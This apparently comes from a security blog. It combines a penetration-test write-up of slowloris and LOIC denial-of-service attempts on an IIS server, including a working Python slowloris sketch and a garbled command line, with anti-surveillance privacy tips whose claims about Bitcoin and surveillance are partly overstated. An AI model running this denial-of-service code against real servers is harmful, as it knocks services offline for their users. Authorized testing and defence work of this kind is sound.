To start the script, run it from the command line after downloading it to your pen test PC. As with any test, you start with what is supposed to work, then review the results and make changes. The changes we made were simple. Each time slowloris runs, it makes a whole bunch of half-open requests to the web server. The requests never finish, and the web server just sits there with a session consumed, waiting for the client to resume communication. This weakness is known to affect some Apache servers but not IIS 7.0; at the time of this test the outcome was unknown, but we thought it would be fun to try. Also check that you have Perl installed (perl -v); most Linux instances do.

We modified the script to change the number of connections, and we lowered the timeout period before starting each new connection. As the script ran, the CPU on the server would spike to 78%, then 100%, then drop again as the script entered its wait interval. Then it would run again, with similar results on the CPU. As far as hacking goes, if you do not get the results you want, just keep trying. So we stopped the script, changed the connections per second to the maximum the script would take (10,000 per second), and tested again. After the second run, Server 2008 R2 would take a hit but continue to serve out the web page. Unfortunately for the pen tester, there was no break in service; fortunately for the company running the software, they stayed operational. As a side note, for a non-Linux tool we also ran the Low Orbit Ion Cannon against the server multiple times in addition to slowloris, and still the web site stayed up.
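The half-open request trick described above is simple to sketch: open a socket, send request headers but never the blank line that ends them, then drip one bogus header just before each timeout so the server keeps the slot reserved. A minimal Python illustration of the mechanism (function names are ours, and the commented-out target is a placeholder; only ever point this at systems you are authorized to test):

```python
import socket

def partial_headers(host):
    """Request headers WITHOUT the terminating blank line (\r\n\r\n),
    so the server treats the request as still in progress."""
    return b"GET / HTTP/1.1\r\nHost: " + host.encode() + b"\r\n"

def open_half_request(host, port=80, timeout=30):
    """Open one slowloris-style half-open connection."""
    s = socket.create_connection((host, port), timeout=timeout)
    s.sendall(partial_headers(host))
    return s

def keep_alive(sock):
    """Drip one harmless extra header to reset the server's read timeout."""
    sock.sendall(b"X-a: b\r\n")

# Usage sketch: hold many half-open requests, refreshing each one
# inside the server's timeout window (authorized targets only).
# conns = [open_half_request("test.lab.example") for _ in range(200)]
# while True:
#     time.sleep(15)
#     for c in conns:
#         keep_alive(c)
```

Against Apache's default one-thread-per-connection model this exhausts worker slots; IIS's connection handling is why the server in our test kept serving pages.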

The following command will result in the same activity as we tested earlier in 2013: ./ -dns -port 443 -timeout 30 -num 10000 -https

In conclusion, we see that Linux offers a wide variety of attack tools that can be run independently or as part of a larger package such as Armitage, distributions like Kali and Ubuntu, and of course the Metasploit Framework. This gives penetration testers the tools they need to test vulnerabilities by trying exploits with different payloads. Some Windows-based tools have gained notoriety, but Linux remains the preferred platform. What is great about Linux and the open source community is that many people contribute to its success, and that will carry the distributions forward as time and technology change.

Going Black – Making it Tough for Big Brother (Series)

Good day, I hope today finds you in perfect peace. Today we are going to talk about a new service and a new approach to keeping your data private. Recent events have shown that the NSA, as well as the big companies out there, are profiling you: they want to store your identity and habits for future use. Netwerk Guardian is going to show you how to thwart their efforts. What good is your personal profile to the NSA, or Google, or any place that collects and harvests it through behavior monitoring? It is information on how you think and live. They could use that information against you if they wanted a contest of who can put more shame on whom; more likely, they will use it to map your political bias and connections. After the Snowden release, they really cannot be any more shameful than they are now. Therefore, we are going to show you how to give them useless data. Useless data renders a surveillance system useless and reduces the taxpayer’s dollars (your money) to a waste of money and time. If enough people do this, maybe they will get the picture and just stop. That part will come at the end of the series. However, the evil in man and the lust for power and control will likely just tick them off, and they will come up with some other regulatory way to make you commit your information to them.

The first step in going off the grid and going black is to change everything you use to something else. Change your email address and your online profiles; if you have Facebook, MySpace, or other limelight platforms, ditch them. YouTube is going to be tough to leave, but granted, if another site comes along offering the same service, it too will be a success. Until then, use the TOR network and a VMware appliance. The best way to change your email address is to buy a domain. It can cost you, but what is your privacy worth?!

Second, buy or use free encryption software to encrypt your emails. Granted, it is going to be a bit painful in the beginning, but you will sleep better knowing that only you and the close ones around you know who you are. There are a few places on the web where you can get this as a service; however, I would rather encrypt locally. One such place, while I have not used it, seems to do the job. There is also a group researching a Java-based encryption and decryption tool that works on anything. I think this will carry far into the future for use on mobile devices across platforms. More to come on this as more software comes to mind.

The third thing you can do is start using the TOR network for browsing, as well as proxy servers, to ditch your fingerprints on the web.

Fourth, you could start using another form of currency that the Federal Reserve does not approve of: Bitcoin. It is hard to trace and holds its worth. There is a movement to outlaw it since it cannot be regulated by one particular body (the global banks), so it obviously works.

In the meantime, if you have time, you can use some automation to start sending up erroneous web traffic data under your old Gmail account while using the Google search page.

More to come as we investigate and take back control of who gets access to what. Stay tuned, because Netwerk Guardian is launching this service to accept requests to anonymize one’s identity and provide safe ways of browsing and using the internet.

Just think…we will have privatized your God-given right to be yourself. This peace of mind comes at a small cost, but we will have done two things: privatized anonymity and stimulated the economy in the technology and security sector.

Keeping Your Internet and Computing Private

Recent stories about Edward Snowden get you thinking about just how secure and private your “Personal Computer” really is. The big data companies are always promoting Google Voice, Google Chat, Gmail, and all that. You have to ask yourself: why is that free? What are they really trying to push? Each year you are at the edge of your seat when you hear they are allowing another free year of Google Voice. Well, that is because you, the public, are willingly offering free intelligence to them. We all psychologically want to be a part of something. We all like gadgets and technology, as they make our days fun and easier. To combat that surveillance by Big Brother or Big Sis, use the following apps from the Android Market Place.

Orbot: Proxy with TOR – Surf anonymously with the TOR project. They will never know you are coming to visit.
TextSecure – Secure text messaging, on the device and in transit.
Gibberbot – Secure chat with popular chat programs, provided the other user has Gibberbot or Pidgin and uses services like Google Chat.

All these applications are a step forward in guarding your mobile privacy; start falling off the grid with them. Next, start using the TOR network at home. Use a VMware guest for surfing and keep your physical computer on the local network as best you can.

There will be more tips in the days ahead on how to be safe and private on the web.